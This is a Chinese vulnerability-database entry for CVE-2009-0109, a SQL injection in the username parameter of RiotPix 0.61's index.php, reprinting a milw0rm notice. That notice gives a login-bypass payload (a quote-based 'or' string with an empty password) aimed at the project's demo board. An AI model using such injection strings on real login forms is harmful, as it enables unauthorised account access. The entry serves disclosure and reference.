RiotPix 脚本index.php参数"username" SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117203 漏洞类型 SQL注入
发布时间 2009-01-06 更新时间 2009-01-29
CVE编号 CVE-2009-0109 CNNVD-ID CNNVD-200901-098
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7682
https://cxsecurity.com/issue/WLB-2009010147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-098
|漏洞详情
RiotPix是一个开源,标准兼容的网络论坛系统。RiotPix0.61以及之前的版本中的index.php存在SQL注入漏洞。远程攻击者可以借助用户名参数,执行任意的SQL指令。
|漏洞EXP
[~] RiotPix <= 0.61 Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 06.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

for demo:

username: logoz ' or '

pass: dont write anything

http://www.riotpix.com/board/

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-06]
|参考资料

来源:BID
名称:33132
链接:http://www.securityfocus.com/bid/33132
来源:MILW0RM
名称:7682
链接:http://www.milw0rm.com/exploits/7682
来源:SREASON
名称:4892
链接:http://securityreason.com/securityalert/4892
来源:SECUNIA
名称:33395
链接:http://secunia.com/advisories/33395